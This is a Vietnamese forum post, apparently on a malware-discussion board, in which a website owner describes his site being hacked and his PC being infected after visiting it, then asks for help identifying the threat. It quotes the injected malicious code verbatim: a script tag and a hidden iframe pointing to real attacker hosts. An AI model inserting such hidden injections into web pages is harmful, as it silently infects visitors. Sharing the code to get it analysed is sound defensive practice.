Website của tôi bị hack (trực tiếp hay local attack tui ko rõ) và hacker đã cài virus vào website bằng cách thêm vào cuối mỗi trang "index" hoặc "default" một dòng code như thế này :
Code:
<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ></script>
<div style="display:none">wuvefkhghifpzmuklyabmhikryjnqoa<iframe width=751 height=442 src="http://age-t.ru:8080/index.php" ></iframe></div>
Khi website của tôi được google cảnh báo là có trojan, tôi rất ngạc nhiên và truy cập thử bằng IE, tự nhiên màn hình nhảy ra một cái popup : "Preparing to install..."
Kể từ lúc đó, TaskMgr không bật lên được. Tôi thử logout ngay lập tức, nhưng khi logout ra thì màn hình đen ngòm. Khởi động lại màn hình vào đến phần (đáng ra phải là) "Welcome" cũng đen ngòm (dù có vào Safe mode)
Sau khi Ghost lại, tôi đã cẩn thận truy cập lại website bằng FF. Mặc dù lúc đó không thấy có hiện tượng gì lạ, nhưng khi tui bật TaskMgr thấy ko được, xác định lại phải Ghost lại lần 2.
Cả 2 lần truy cập trên máy đều đang cài KAV 9, nhưng có lẽ KAV không đối phó kịp với con virus này.
Tôi thử liều truy cập và lấy file Script của nó từ nguồn : "http://age-t.ru:8080/index.php" thì xem thấy nó là 1 file chứa code JS đã bị mã hóa.
Xin các bạn giúp tôi xác định xem nó thuộc thể loại gì và mức độ nguy hiểm ra sao được không? (Hoặc phải xử lý thế nào nếu lần sau gặp phải loại website như thế này - và máy tính tiếp tục dính ?)
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]")
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[Avatar]](/hvaonline/images/avatar/3099a4ec6dc1da1e77c1b4070c7aa9b8.jpg "[Avatar]")
![[Avatar]](/hvaonline/images/avatar/a056749f32501d21492f749ecb188db8.png "[Avatar]")
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")